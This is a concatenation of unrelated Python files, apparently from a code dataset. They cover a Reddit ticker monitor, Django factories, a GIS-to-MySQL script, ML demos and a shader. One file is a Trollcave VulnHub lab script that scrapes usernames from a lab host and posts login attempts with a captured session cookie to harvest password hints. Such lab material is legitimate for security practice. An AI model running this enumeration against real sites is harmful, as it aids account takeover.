            _df['source'] = re.findall(r"symbols\/([a-zA-Z]+)\.txt", filename)[0]
            df = df.append(_df)
        # Drop rows with missing fields; result exposed as self.df.
        self.df = df.dropna()
tickers = Tickers()
df = tickers.df
# Symbols to match & ignore
# Universe of valid ticker symbols, plus common English words that collide
# with real tickers and must be excluded from matches.
real_symbols = df['Symbol'].unique()
false_symbol = ['ON','IN','AT','FOR','BY','DD','YOLO','CORP','ONE','SUB','MOON','CEO','OUT','INTO','MAN','POST','BRO','LIFE','CALL','DUDE','IDEA']
# Get the credentials & settings for PRAW
# NOTE(review): in dev mode neither the auth import nor the commented-out
# environment fallback runs, so the reddit_* names are undefined and
# Monitor() would raise NameError — confirm intended.
if dev_mode != True:
    from auth import reddit_client_id, reddit_client_secret, reddit_password, reddit_useragent, reddit_username
##reddit_client_id=os.environ['reddit_client_id']
#reddit_client_secret=os.environ['reddit_client_secret']
#reddit_password=os.environ['reddit_password']
#reddit_useragent=os.environ['reddit_useragent']
#reddit_username=os.environ['reddit_username']
# Monitor Reddit
class Monitor:
    """Streams subreddit submissions/comments and tallies ticker mentions.

    Mention counts (and rocket-emoji counts) are accumulated into per-minute
    pickled DataFrames under datasets/data/, indexed in datasets/datasets.pkl.
    """

    def __init__(self):
        print("Monitoring")
        self.df = False       # current per-minute counts frame (False until first record)
        self.df_name = False  # timestamp name of the current frame
        if os.path.exists(fix_path('datasets/datasets.pkl')):
            self.datasets = pd.read_pickle(fix_path('datasets/datasets.pkl'))
        else:
            self.datasets = pd.DataFrame()
        # PRAW setup
        self.praw = praw.Reddit(
            client_id=reddit_client_id,
            client_secret=reddit_client_secret,
            # BUG FIX: this argument contained the anonymization placeholder
            # "<PASSWORD>", which is not valid Python; restored the
            # credential imported from auth alongside the other settings.
            password=reddit_password,
            user_agent=reddit_useragent,
            username=reddit_username
        )

    def start(self, subreddit="wallstreetbets", thread=True):
        """Begin monitoring *subreddit*, optionally on background threads.

        NOTE(review): with thread=False the comment loop blocks forever, so
        monitorSubmissions is never reached — confirm intended for dev mode.
        """
        sub = self.praw.subreddit(subreddit)
        if thread is True:
            commentThread = threading.Thread(name='comments', target=self.monitorComments, args=(sub, subreddit))
            submissionThread = threading.Thread(name='submissions', target=self.monitorSubmissions, args=(sub, subreddit))
            commentThread.start()
            submissionThread.start()
        else:
            self.monitorComments(sub, subreddit)
            self.monitorSubmissions(sub, subreddit)

    def monitorSubmissions(self, sub, subreddit):
        """Blocking loop over the subreddit's submission stream."""
        for submission in sub.stream.submissions():
            self.process_submission(submission, subreddit)

    def monitorComments(self, sub, subreddit):
        """Blocking loop over the subreddit's comment stream."""
        for comment in sub.stream.comments():
            self.process_comment(comment, subreddit)

    def _find_symbols(self, text):
        """Return ticker symbols mentioned in *text* (shared scan logic).

        A token counts when spaCy tags it ADP/NOUN/PROPN, its uppercase form
        (dropping anything after a '.') is a known symbol, and it is not in
        the false-positive word list.
        """
        found = []
        for token in nlp(text):
            if '.' in token.text:
                w = token.text.upper().split('.')[0]
            else:
                w = token.text.upper()
            if token.pos_ in ['ADP', 'NOUN', 'PROPN'] and w in real_symbols and w not in false_symbol:
                found.append(w)
        return found

    def process_submission(self, submission, subreddit):
        """Record symbols mentioned in a submission's title or self-text."""
        found = self._find_symbols(submission.title.lower()) + self._find_symbols(submission.selftext.lower())
        # Rocket emoji is only checked in the title, matching prior behaviour.
        has_rocket = '🚀' in submission.title.lower()
        if len(found) > 0:
            self.record(source='submission', has_rocket=has_rocket, symbols=list(set(found)), title=submission.title, subreddit=subreddit)

    def process_comment(self, comment, subreddit):
        """Record symbols mentioned in a comment body."""
        found = self._find_symbols(comment.body.lower())
        has_rocket = '🚀' in comment.body.lower()
        if len(found) > 0:
            self.record(source='comment', has_rocket=has_rocket, symbols=list(set(found)), title=comment.body, subreddit=subreddit)

    def get_df(self):
        """Return the DataFrame for the current minute, rolling files over.

        A new pickle named YYYY-M-D_H_M.pkl is started whenever the minute
        changes; the previous buffer is flushed to disk and indexed in
        datasets/datasets.pkl.
        """
        d = datetime.now()
        dname = '{}-{}-{}_{}_{}'.format(d.year, d.month, d.day, d.hour, d.minute)
        filename = fix_path("datasets/data/" + dname + ".pkl")
        if self.df_name != False:
            filename_prev = fix_path("datasets/data/" + self.df_name + ".pkl")
        if self.df_name != dname:
            # New timestep, move on to a new dataset.
            # NOTE(review): this hard-coded absolute prefix only matters on
            # the original author's machine; elsewhere replace() is a no-op.
            self.datasets.at[datetime.timestamp(d), 'filename'] = filename.replace('/home/julien/mk2/main/', '')
            self.datasets.to_pickle(fix_path('datasets/datasets.pkl'))
            print("#### New DF: ", filename)
            # Not the first run? Flush the previous timestep's buffer.
            if self.df_name != False:
                self.df.to_pickle(filename_prev)
            # Create or recover the frame for the new timestep.
            if os.path.exists(filename):
                self.df = pd.read_pickle(filename)
                self.df_name = dname
            else:
                self.df = pd.DataFrame(columns=['comment', 'submission', 'rockets'])
                self.df_name = dname
                self.df.to_pickle(filename)
        return self.df

    def record(self, source, has_rocket, symbols, subreddit, title=''):
        """Increment mention counters for each symbol in the current frame.

        Args:
            source: 'submission' or 'comment' (also the counter column).
            has_rocket: whether the text contained the rocket emoji.
            symbols: de-duplicated symbols to count.
            subreddit: subreddit name (logged only).
            title: originating text (logged only).
        """
        print(subreddit, source, has_rocket, symbols)
        df = self.get_df()
        for symbol in symbols:
            if symbol in df.index:
                df.at[symbol, source] = df.at[symbol, source] + 1
                if has_rocket:
                    df.at[symbol, 'rockets'] = df.at[symbol, 'rockets'] + 1
            else:
                # First sighting: initialise all three counters.
                df.at[symbol, "submission"] = 0
                df.at[symbol, "comment"] = 0
                df.at[symbol, source] = 1
                df.at[symbol, 'rockets'] = 1 if has_rocket else 0
# Start the Reddit monitors. In dev mode a single subreddit runs in the
# foreground for easy debugging; otherwise each subreddit gets its own
# background thread.
reddit = Monitor()
if dev_mode:  # PEP 8: never compare booleans with `== True`
    reddit.start(subreddit="wallstreetbets", thread=False)
else:
    reddit.start(subreddit="wallstreetbets", thread=True)
    reddit.start(subreddit="pennystocks", thread=True)
    reddit.start(subreddit="Baystreetbets", thread=True)
62533 | <gh_stars>10-100
#!/usr/bin/env python3
# Copyright 2004-present Facebook. All Rights Reserved.
import collections
import copy
from typing import Dict
def deep_update(dst: Dict, src: Dict, join_lists: bool = False) -> None:
    """Recursively merge ``src`` into ``dst``, mutating ``dst`` in place.

    Nested mappings are merged key-by-key. Any other value from ``src``
    replaces the value in ``dst`` with a deep copy of itself. When
    ``join_lists`` is true and both sides hold a list for the same key,
    the ``src`` list is appended to the ``dst`` list instead of
    overwriting it.

    Args:
        dst: The destination dictionary, updated in place.
        src: The source dictionary whose entries are merged into ``dst``.
        join_lists: Concatenate matching lists rather than overwrite them.

    Example:
        >>> d = {'foo': {'bar': 'qux', 'quux': 'quuz'}}
        >>> deep_update(d, {'foo': {'bar': 'baz'}})
        >>> d
        {'foo': {'bar': 'baz', 'quux': 'quuz'}}
    """
    for key, new_value in src.items():
        if key not in dst:
            # Deep-copy so later mutation of src cannot alias into dst.
            dst[key] = copy.deepcopy(new_value)
            continue
        current = dst[key]
        if isinstance(new_value, dict) and isinstance(current, collections.abc.Mapping):
            deep_update(current, new_value, join_lists)
        elif join_lists and isinstance(new_value, list) and isinstance(current, list):
            dst[key] = current + new_value
        else:
            dst[key] = copy.deepcopy(new_value)
| StarcoderdataPython |
1791141 | import autogp
import matplotlib.pyplot as plt
import numpy as np
import tensorflow as tf
# Generate synthetic data: a noiseless sine curve sampled on [0, 5].
N_all = 200
N = 50
# Column vector of shape (N_all, 1), as required by the GP API below.
inputs = 5 * np.linspace(0, 1, num=N_all)[:, np.newaxis]
outputs = np.sin(inputs)
# Random train/test split: first N shuffled indices train, the rest test.
idx = np.arange(N_all)
np.random.shuffle(idx)
xtrain = inputs[idx[:N]]
ytrain = outputs[idx[:N]]
data = autogp.datasets.DataSet(xtrain, ytrain)
xtest = inputs[idx[N:]]
ytest = outputs[idx[N:]]
# Initialize the Gaussian process: Gaussian likelihood, single RBF kernel.
likelihood = autogp.likelihoods.Gaussian()
kernel = [autogp.kernels.RadialBasis(1)]
# Use every training point as an inducing input.
inducing_inputs = xtrain
model = autogp.GaussianProcess(likelihood, kernel, inducing_inputs)
# Train the model with RMSProp (TF1-style optimizer).
optimizer = tf.train.RMSPropOptimizer(0.005)
model.fit(data, optimizer, loo_steps=50, var_steps=50, epochs=1000)
# Predict the held-out inputs (predictive variance is discarded).
ypred, _ = model.predict(xtest)
# Plot: training points (.), true test values (o), predictions (x).
plt.plot(xtrain, ytrain, '.', mew=2)
plt.plot(xtest, ytest, 'o', mew=2)
plt.plot(xtest, ypred, 'x', mew=2)
plt.show()
| StarcoderdataPython |
3309721 | <filename>Main.py
from ursina import *
dissolve=Shader(language=Shader.GLSL,fragment="""
#version 400
uniform sampler2D p3d_Texture0;
uniform sampler2D noiseTex;
uniform float threshold;
in vec2 uv;
out vec4 color;
void main(){
float noiseVal=texture(noiseTex,uv).x;
if(noiseVal>=threshold){
color=vec4(0,0,0,0);
}
else{
float final_alpha=1;
float alphaVal=threshold-noiseVal;
if(alphaVal<=0.1){
color=vec4(0.3,1,1,(alphaVal*5)/2); //change the color for the dissolving effect over here. first three values are for the color.
}
else{
color=texture(p3d_Texture0,uv);
}
}
}
""")
if __name__=="__main__":
    from ursina import *
    # Start fully visible; holding space dissolves the cube over time.
    threshold=1
    def update():
        # Called by Ursina once per frame.
        global threshold
        e.set_shader_input("threshold",threshold)
        if threshold>0 and held_keys["space"]:
            threshold-=time.dt/10 #change the divisor to slow down or speed up the effect
    app=Ursina()
    e=Entity(model="cube",texture="brick")
    e.shader=dissolve
    e.set_shader_input("noiseTex",load_texture("noise2.png")) #put your texture here
    plyer=EditorCamera()
    app.run()
| StarcoderdataPython |
3394502 | <filename>src/GIS/mammals_distribution.py
import csv
import tqdm
import os
import subprocess
import tqdm
def readFile_index():
    """Read species names from the kernel-density index CSV.

    Reads the first column of ``mammal/akernel_density.csv``, skipping empty
    rows, then strips the 'data' and 'mammals' header entries and the last
    (summary) row.

    Returns:
        list[str]: Species names in file order.

    Raises:
        ValueError: If the expected 'data'/'mammals' entries are absent.
    """
    filename_list = []
    with open('mammal/akernel_density.csv', newline='') as csvfile:
        # Don't reuse the file-handle name for the reader.
        reader = csv.reader(csvfile, delimiter=',', quotechar='"')
        for row in reader:
            if row:  # skip blank lines
                filename_list.append(row[0])
    # Drop the two header entries and the trailing summary row.
    filename_list.remove('data')
    filename_list.remove('mammals')
    filename_list.pop()
    return filename_list
# Species names indexed by position; used below to map "KD<N>.tif" raster
# numbers to species names (name_list[N-2]).
name_list = readFile_index()
def extract_contour(inputFilePath, outputPath, fileName):
    """Run gdal_contour on a GeoTIFF, writing ``<fileName>.shp`` into a
    subdirectory of *outputPath* named after the input raster.

    Args:
        inputFilePath: Path to the source .tif raster.
        outputPath: Parent directory for the per-raster output directory.
        fileName: Output shapefile base name (".shp" is appended).

    Returns:
        bool: False if the input is missing or gdal_contour exits non-zero,
        True on success. (Previously this returned True even when the
        subprocess failed; now consistent with export2DB.)
    """
    gdal_contour = "/usr/bin/gdal_contour"
    if not os.path.exists(inputFilePath):
        print("input File Path does not exist")
        return False
    # Output directory is the raster's base name without its ".tif" extension.
    directoryName = os.path.basename(inputFilePath)
    directory = directoryName[:-4]
    outputPath = os.path.join(outputPath, directory)
    if not os.path.exists(outputPath):
        os.mkdir(outputPath)
    fileName = fileName + ".shp"
    outputPath = os.path.join(outputPath, fileName)
    # Contour interval 1 ("-i 1"); contour values stored in the "sightings"
    # attribute of the output shapefile.
    export = subprocess.Popen([gdal_contour, "-a", "sightings", "-i", "1",
                               "-f", "ESRI Shapefile", inputFilePath, outputPath])
    return export.wait() == 0
"""
inputFilePath = "mammal/KD3.tif"
outputPath = "./"
fileName = name_list[1]
status = extract_contour(inputFilePath,outputPath,fileName)
if(status == True):
print("done")
"""
def export2DB(filePath):
    """Load a shapefile into the local MySQL ``crabnet`` database via ogr2ogr.

    Equivalent CLI:
        ogr2ogr -f "MySQL" MYSQL:"crabnet,host=localhost,..." -a_srs "EPSG:4326" file.shp

    SECURITY NOTE: database credentials are hard-coded in the connection
    string below; consider reading them from the environment instead.

    Args:
        filePath: Path to the .shp file to import.

    Returns:
        bool: True when ogr2ogr exits successfully, False otherwise.
    """
    ogr2ogr = "/usr/bin/ogr2ogr"
    export = subprocess.Popen([ogr2ogr, "-f", "MYSQL", "MYSQL:crabnet,host=localhost,user=admin,password=<PASSWORD>,port=3306", "-a_srs", "EPSG:4326", filePath])
    # Simplified from an if/else returning False/True on the same test.
    return export.wait() == 0
"""
status = export2DB()
if(status == True):
print("export to db done")
"""
# Collect the per-species kernel-density GeoTIFF rasters.
tif_fileList = []
tifs_path = "./mammal"
for tif in os.listdir(tifs_path):
    if tif.endswith(".tif"):
        tif_fileList.append(tif)
tif_fileList.sort()
# The all-species raster has no matching entry in name_list; skip it.
tif_fileList.remove("KD_all_mammals.tif")
print(tif_fileList)
# For each raster: extract contours to a shapefile, then load it into MySQL.
for i in range(len(tif_fileList)):
    index = tif_fileList[i]
    # File names look like "KD<N>.tif"; species N maps to name_list[N-2].
    index = index[2:-4]
    index = int(index)-2
    output_fileName = name_list[index]
    outputPath = "."
    input_file = os.path.join("./mammal",tif_fileList[i])
    if (extract_contour(input_file, outputPath, output_fileName)):
        print(output_fileName, " created")
        # extract_contour writes into a directory named after the raster.
        path = tif_fileList[i]
        path = path[:-4]
        output_fileName += ".shp"
        shapefile_path = os.path.join(path,output_fileName)
        if(export2DB(shapefile_path)):
            print(shapefile_path, " exported")
| StarcoderdataPython |
3201148 | <gh_stars>1-10
# Name of the directory created inside a repository's .git folder where this
# tool persists its own state (kept out of the working tree on purpose).
GIT_SUBDIR = "privacy" # subdir in .git used for storing state
| StarcoderdataPython |
3347821 | <gh_stars>0
from factory import Faker, LazyAttribute, Maybe, SubFactory, lazy_attribute
from ..core.factories import DjangoModelFactory
from . import models
# Question types whose answers the factories can generate automatically:
# everything except static/form containers and dynamic-choice questions,
# which need external data (a sub-form or a data source) to be meaningful.
AUTO_QUESTION_TYPES = [
    t
    for t in models.Question.TYPE_CHOICES
    if t
    not in [
        models.Question.TYPE_STATIC,
        models.Question.TYPE_FORM,
        models.Question.TYPE_DYNAMIC_CHOICE,
        models.Question.TYPE_DYNAMIC_MULTIPLE_CHOICE,
    ]
]
class FormFactory(DjangoModelFactory):
    """Factory for ``models.Form``: random slug/name, unpublished, unarchived."""

    slug = Faker("slug")
    name = Faker("multilang", faker_provider="name")
    description = Faker("multilang", faker_provider="text")
    meta = {}
    is_published = False
    is_archived = False

    class Meta:
        model = models.Form
class QuestionFactory(DjangoModelFactory):
    """Factory for ``models.Question``.

    Picks a random auto-generatable type (AUTO_QUESTION_TYPES). Fields that
    only apply to certain types (row_form, sub_form, static_content,
    data_source) are populated conditionally via the ``Params`` flags below.
    """

    slug = Faker("slug")
    label = Faker("multilang", faker_provider="name")
    type = Faker("word", ext_word_list=AUTO_QUESTION_TYPES)
    is_required = "true"
    is_hidden = "false"
    configuration = {}
    meta = {}
    is_archived = False
    format_validators = []
    # Table questions embed a row form; all other types leave it None.
    row_form = Maybe(
        "is_table", yes_declaration=SubFactory(FormFactory), no_declaration=None
    )
    # Form questions embed a sub form.
    sub_form = Maybe(
        "is_form", yes_declaration=SubFactory(FormFactory), no_declaration=None
    )
    # Static questions carry display-only content.
    static_content = Maybe(
        "is_static",
        yes_declaration=Faker("multilang", faker_provider="text"),
        no_declaration=None,
    )
    # Dynamic (multiple) choice questions reference a data source by name.
    data_source = Maybe(
        "is_dynamic", yes_declaration="MyDataSource", no_declaration=None
    )

    class Meta:
        model = models.Question

    class Params:
        # Derived flags consumed by the Maybe() declarations above; computed
        # from the randomly chosen question type.
        is_table = LazyAttribute(lambda q: q.type == models.Question.TYPE_TABLE)
        is_form = LazyAttribute(lambda q: q.type == models.Question.TYPE_FORM)
        is_dynamic = LazyAttribute(
            lambda q: q.type
            in [
                models.Question.TYPE_DYNAMIC_CHOICE,
                models.Question.TYPE_DYNAMIC_MULTIPLE_CHOICE,
            ]
        )
        is_static = LazyAttribute(lambda q: q.type == models.Question.TYPE_STATIC)
class OptionFactory(DjangoModelFactory):
    """Factory for ``models.Option``: random slug/label, unarchived."""

    slug = Faker("slug")
    label = Faker("multilang", faker_provider="name")
    is_archived = False
    meta = {}

    class Meta:
        model = models.Option
class QuestionOptionFactory(DjangoModelFactory):
    """Factory for the Question<->Option through model (sort defaults to 0)."""

    option = SubFactory(OptionFactory)
    question = SubFactory(QuestionFactory)
    sort = 0

    class Meta:
        model = models.QuestionOption
class FormQuestionFactory(DjangoModelFactory):
    """Factory for the Form<->Question through model (sort defaults to 0)."""

    form = SubFactory(FormFactory)
    question = SubFactory(QuestionFactory)
    sort = 0

    class Meta:
        model = models.FormQuestion
class DocumentFactory(DjangoModelFactory):
    """Factory for ``models.Document``; family=None means a root document."""

    form = SubFactory(FormFactory)
    family = None
    meta = {}

    class Meta:
        model = models.Document
class FileFactory(DjangoModelFactory):
    """Factory for ``models.File`` with a random file name."""

    name = Faker("file_name")

    class Meta:
        model = models.File
class AnswerFactory(DjangoModelFactory):
    """Factory for ``models.Answer``.

    The ``value`` is generated to match the question's type; file and date
    questions store their payload in dedicated ``file``/``date`` fields
    instead (populated via the ``Params`` flags below), and table questions
    keep their rows in related documents, so those get ``value=None``.
    """

    question = SubFactory(QuestionFactory)
    document = SubFactory(DocumentFactory)
    meta = {}

    @lazy_attribute
    def value(self):
        # Generate a type-appropriate value: a two-item list for
        # multiple-choice types, numbers for float/integer, a random
        # name for other value-bearing types, None otherwise.
        if (
            self.question.type == models.Question.TYPE_MULTIPLE_CHOICE
            or self.question.type == models.Question.TYPE_DYNAMIC_MULTIPLE_CHOICE
        ):
            return [Faker("name").generate({}), Faker("name").generate({})]
        elif self.question.type == models.Question.TYPE_FLOAT:
            return Faker("pyfloat").generate({})
        elif self.question.type == models.Question.TYPE_INTEGER:
            return Faker("pyint").generate({})
        elif self.question.type not in [
            models.Question.TYPE_TABLE,
            models.Question.TYPE_FILE,
            models.Question.TYPE_DATE,
        ]:
            return Faker("name").generate({})
        return None

    # Only file questions get an attached File object.
    file = Maybe(
        "is_file", yes_declaration=SubFactory(FileFactory), no_declaration=None
    )
    # Only date questions get a date value.
    date = Maybe("is_date", yes_declaration=Faker("date"), no_declaration=None)

    class Meta:
        model = models.Answer

    class Params:
        # Derived flags based on the related question's type.
        is_file = LazyAttribute(lambda a: a.question.type == models.Question.TYPE_FILE)
        is_date = LazyAttribute(lambda a: a.question.type == models.Question.TYPE_DATE)
class AnswerDocumentFactory(DjangoModelFactory):
    """Factory for the Answer<->Document through model (sort defaults to 0)."""

    answer = SubFactory(AnswerFactory)
    document = SubFactory(DocumentFactory)
    sort = 0

    class Meta:
        model = models.AnswerDocument
| StarcoderdataPython |
3210412 | <filename>Boot2Root/vulnhub/Trollcave-v1-2/scripts/user-hint-enum.py
import requests
import re
def GetUserByID(id):
    """Scrape the username from the profile page of user *id*.

    The "send PM" link on the page leaks the username, e.g.
    ``<a href="/send_pm?recipient_name=King">PM</a>``.
    """
    page = requests.get('http://192.168.1.30/users/' + str(id)).text.strip()
    return re.search('recipient_name=(.*?)"', page).group(1)
def GetRoleByID(id):
    """Scrape the role label (e.g. 'Superadmin') from the profile page of *id*.

    The role is rendered inside the user-info block::

        <div class='user-info'>
        <b>
        Superadmin
        </b>
    """
    page = requests.get('http://192.168.1.30/users/' + str(id)).text.strip()
    return re.search('>\x0A<b>\x0A(.*?)\x0A</b>', page).group(1)
def GetHintByID(id):
    """Attempt a login as user *id* and scrape the flash-notice hint.

    Looks up the username for *id*, posts a login with a fixed (redacted)
    password, and extracts the text of the resulting notice message.

    Returns:
        tuple[str, str]: (username, hint).
    """
    username = GetUserByID(id)
    # Session cookie captured from a browser session; required so the CSRF
    # token in the payload is accepted by the server.
    cookie = {'_thirtytwo_session':'RHZ0Q2ZlY0hXaExlbjh5bUw0QkladzBSVTBQaHhBVzlKUWpqRGtTcHZlSDJTZjRaY0pkL3lWNDl4aXBaa1owdDllbnNQK1lzd2ZVMjBZNTdZUnNSRERnQTFRaUREMlVtWkNiQ0R5c1R3YmxMNjdacWJjbWszOS9MVGdralJtNnFRTmR4WTF1b2JSR2hWaWZtSWdxOW5yL1ZoZVBGMW9rMGNZMWxDQ3VVWFViRUtVUk10S05sa0IzZVJWclI3K2NLcEVUOW5hUnBjcW1XQWFyZ1phZkdwbGV0SlhQeWo2VkF3Ykc0dnNaNUp5OD0tLWtxUmM4T3o4SGQ3N251bnNvdHVyb1E9PQ%3D%3D--540a8dc376ed2b26f7f47ae7cbde2e40b88ebb79'}
    # NOTE(review): authenticity_token and password are redacted placeholders
    # (<KEY>/<PASSWORD>) -- fill in real values before running.
    payload = {'authenticity_token':'<KEY>', 'session[name]':username, 'session[password]':'<PASSWORD>', 'commit': 'Log in'}
    response = (requests.post('http://192.168.1.30/login/', data=payload, cookies=cookie).text).strip()
    # Extract the text immediately following notice'> in the response markup.
    hint = re.search('notice\'>(.*?)<', response).group(1)
    return username, hint
# Enumerate the first 20 user IDs and print each user's login hint.
for i in range(0, 20):
    try:
        username, hint = GetHintByID(i)
        print(username + "\t" + hint)
    except Exception:
        # The original bare `except: None` silently swallowed everything,
        # including KeyboardInterrupt/SystemExit. Catch only Exception and
        # skip IDs with no user page or an unparsable response.
        pass
| StarcoderdataPython |
1756896 | from django.urls import path
from . import views
# URL routes for the blog-style Post views. Each `name` is the identifier
# used when reversing the URL (e.g. in templates); `<pk>` maps to the
# Post's primary key (id).
urlpatterns = [
    path('', views.Index.as_view(), name="index"),
    # Passing a Post's ID as <pk> renders that post's detail page.
    path('detail/<pk>/', views.Detail.as_view(), name="detail"),
    path('create/', views.Create.as_view(), name='create'),
    path('update/<pk>', views.Update.as_view(), name="update"),
    path('delete/<pk>', views.Delete.as_view(), name="delete"),
] | StarcoderdataPython |
3320963 | import os
import yaml
from .alerts import Alert
def contents_of_file(filename):
    """Return the entire text contents of *filename*.

    Uses a context manager so the file handle is closed even if ``read()``
    raises (the original leaked the handle on error).
    """
    with open(filename) as open_file:
        return open_file.read()
def get_config(path):
    """Load the YAML file at *path* and wrap it in a :class:`Config`."""
    return Config(path)
class Config(object):
    """Read-only view over a YAML config file with environment overrides.

    Lookup semantics: :meth:`get` lets the ``KEY`` environment variable win
    over the lowercased ``key`` entry in the YAML data; :meth:`has` checks
    the YAML data first and falls back to the environment.
    """

    def __init__(self, path):
        # Parse the whole document once; SafeLoader avoids executing
        # arbitrary YAML tags from untrusted files.
        alert_yml = contents_of_file(path)
        self._data = yaml.load(alert_yml, Loader=yaml.SafeLoader)

    def data(self, key):
        """Return the raw YAML value for *key* (no env override), or None."""
        return self._data.get(key)

    def get(self, key, default=None):
        """Return env var *key* if set, else YAML ``key.lower()``, else *default*."""
        return os.environ.get(key, self._data.get(key.lower(), default))

    def has(self, key):
        """Return True if *key* resolves to a non-empty, non-None value."""
        _key = key.lower()
        if _key in self._data:
            value = self._data[_key]
        else:
            # os.environ.get returns None when unset, matching the
            # original "no value" sentinel.
            value = os.environ.get(key)
        return value is not None and value != ''

    def alerts(self):
        """Build an Alert for each entry of 'alerts', sharing 'docs_url'."""
        doc_url = self._data.get('docs_url')
        # Comprehension replaces the manual append loop.
        return [Alert(alert_string, doc_url)
                for alert_string in self._data.get('alerts')]

    def has_keys(self, keys):
        """Return True only if every key in *keys* satisfies :meth:`has`."""
        # all() replaces the manual early-return loop.
        return all(self.has(key) for key in keys)
| StarcoderdataPython |
194332 | # Image augmentation with ImageDataGenerator
# Steps
# 1. Prepare images dataset
# 2. create ImageDataGenerator
# 3. Create iterators flow() or flow_from_directory(...)
# 4. Fit
# Horizontal shift image augmentation
from PIL import Image
from numpy import expand_dims
from keras.preprocessing.image import load_img, img_to_array, ImageDataGenerator
from matplotlib import pyplot
img = load_img('bird.jpg')
data = img_to_array(img)
# expand dimension to one sample
samples = expand_dims(data, 0)
dgen = ImageDataGenerator(horizontal_flip=True)
# make iterator
it = dgen.flow(samples, batch_size=1)
# gen samples and plot
for i in range(9):
pyplot.subplot(330 + 1 + i)
# Generate batch of images
batch = it.next()
# convert to unsigned ints for viewing
image = batch[0].astype('uint8')
pyplot.imshow(image)
pyplot.show() | StarcoderdataPython |
84462 | print(3 // 7)
| StarcoderdataPython |
1787093 | <gh_stars>1-10
import collections
import time
import ocs
from ocs import site_config
def _get_op(op_type, name, encoded, client):
"""Factory for generating matched operations. This will make sure
op.start's docstring is the docstring of the operation.
Parameters:
op_type (str): Operation type, either 'task' or 'process'.
name (str): Operation name
encoded (dict): Encoded :class:`ocs.ocs_agent.AgentTask` or
:class:`ocs.ocs_agent.AgentProcess` dictionary.
client (ControlClient): Client object, which will be used to issue the
requests for operation actions.
"""
class MatchedOp:
def start(self, **kwargs):
return OCSReply(*client.request('start', name, params=kwargs))
def wait(self, timeout=None):
return OCSReply(*client.request('wait', name, timeout=timeout))
def status(self):
return OCSReply(*client.request('status', name))
class MatchedTask(MatchedOp):
def abort(self):
return OCSReply(*client.request('abort', name))
def __call__(self, **kw):
"""Runs self.start(**kw) and, if that succeeds, self.wait()."""
result = self.start(**kw)
if result[0] != ocs.OK:
return result
return self.wait()
class MatchedProcess(MatchedOp):
def stop(self):
return OCSReply(*client.request('stop', name))
def __call__(self):
"""Equivalent to self.status()."""
return self.status()
MatchedOp.start.__doc__ = encoded['docstring']
if op_type == 'task':
return MatchedTask()
elif op_type == 'process':
return MatchedProcess()
else:
raise ValueError("op_type must be either 'task' or 'process'")
def _opname_to_attr(name):
for c in ['-', ' ']:
name = name.replace(c, '_')
return name
class OCSClient:
"""The simple OCS Client, facilitating task/process calls.
OCSClient makes an Agent's tasks/processes available as class attributes,
making it easy to setup a client instance and call the associated Agent's
tasks and processes.
Example:
This example sets up an OCSClient object and calls a FakeDataAgent's
Task (delay_task) and process (acq)::
>>> client = OCSClient('fake-data-1')
>>> client.delay_task(delay=5)
>>> client.acq.start()
Attributes:
instance_id (str): instance-id for agent to run
"""
def __init__(self, instance_id, **kwargs):
"""
Args:
instance_id (str): Instance id for agent to run
args (list or args object, optional):
Takes in the parser arguments for the client.
If None, pass an empty list.
If list, reads in list elements as arguments.
Defaults to None.
.. note::
For additional ``**kwargs`` see site_config.get_control_client.
"""
if kwargs.get('args') is None:
kwargs['args'] = []
self._client = site_config.get_control_client(instance_id, **kwargs)
self.instance_id = instance_id
self._api = self._client.get_api()
for name, _, encoded in self._api['tasks']:
setattr(self, _opname_to_attr(name),
_get_op('task', name, encoded, self._client))
for name, _, encoded in self._api['processes']:
setattr(self, _opname_to_attr(name),
_get_op('process', name, encoded, self._client))
def _humanized_time(t):
if abs(t) < 1.:
return '%.6f s' % t
if abs(t) < 120:
return '%.1f s' % t
if abs(t) < 120*60:
return '%.1f mins' % (t / 60)
if abs(t) < 48*3600:
return '%.1f hrs' % (t / 3600)
return '%.1f days' % (t / 86400)
class OCSReply(collections.namedtuple('_OCSReply',
['status', 'msg', 'session'])):
def __repr__(self):
try:
ok_str = ocs.ResponseCode(self.status).name
except ValueError:
ok_str = '???'
text = 'OCSReply: %s : %s\n' % (ok_str, self.msg)
if self.session is None or len(self.session.keys()) == 0:
return text + ' (no session -- op has never run)'
# try/fail in here so we can make assumptions about key
# presence and bail out to a full dump if anything is weird.
try:
handled = ['op_name', 'session_id', 'status', 'start_time',
'end_time', 'messages', 'success']
s = self.session
run_str = 'status={status}'.format(**s)
if s['status'] in ['starting', 'running']:
run_str += ' for %s' % _humanized_time(
time.time() - s['start_time'])
elif s['status'] == 'done':
if s['success']:
run_str += ' without error'
else:
run_str += ' with ERROR'
run_str += ' %s ago, took %s' % (
_humanized_time(time.time() - s['end_time']),
_humanized_time(s['end_time'] - s['start_time']))
text += (' {op_name}[session={session_id}]; '
'{run_str}\n'.format(run_str=run_str, **s))
messages = s.get('messages', [])
if len(messages):
to_show = min(5, len(messages))
text += (' messages (%i of %i):\n' % (to_show, len(messages)))
for m in messages:
text += ' %.3f %s\n' % (m[0], m[1])
also = [k for k in s.keys() if k not in handled]
if len(also):
text += (' other keys in .session: ' + ', '.join(also))
except Exception as e:
text += ('\n [session decode failed with exception: %s\n'
' Here is everything in .session:\n %s\n]') \
% (e.args, self.session)
return text
| StarcoderdataPython |
145748 | <reponame>Mitul-Joby/Semester-1-Python-Lab
def Length(L):
C = 0
for _ in L:
C+=1
return C
N = int(input('\nEnter number of elements in list to be entered: '))
L = []
for i in range(0,N):
L.append(input('Enter an element: '))
print('\nLength of list:',Length(L)) | StarcoderdataPython |
1774917 | # Semana 7
# Exercício 1
# <NAME>
# Escreva um programa que recebe como entradas dois números inteiros correspondentes à largura e à altura de um retângulo;
# O programa deve imprimir uma cadeira de caracteres que represente o retângulo informado com caracteres "#" na saída.
# Dica: a função print pode receber um parâmetro "end", que altera o último caractere da cadeia, tornando possível a remoção
# da quebra de linha.
x = int(input("Digite a largura do retângulo:"))
y = int(input("Digite a altura do retângulo:"))
a = 1
while a <=y :
print("#" * x, end="")
print()
a += 1
| StarcoderdataPython |
33754 | <filename>src/models/predict_text_model.py
from ast import literal_eval
from performance_metrics import get_performance_metrics
from tensorflow.keras.models import load_model
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '1' # Ignore tf info messages
import pandas as pd
if __name__ == "__main__":
TASK = "humanitarian"
print("\nLoading in testing data...")
# Read in testing data
test_filepath = f"../../data/interim/task_{TASK}_test_preprocessed_text.csv"
test_df = pd.read_csv(test_filepath)
# Extract data and labels from dataset
test_X = list(test_df["padded_sequence"].apply(literal_eval))
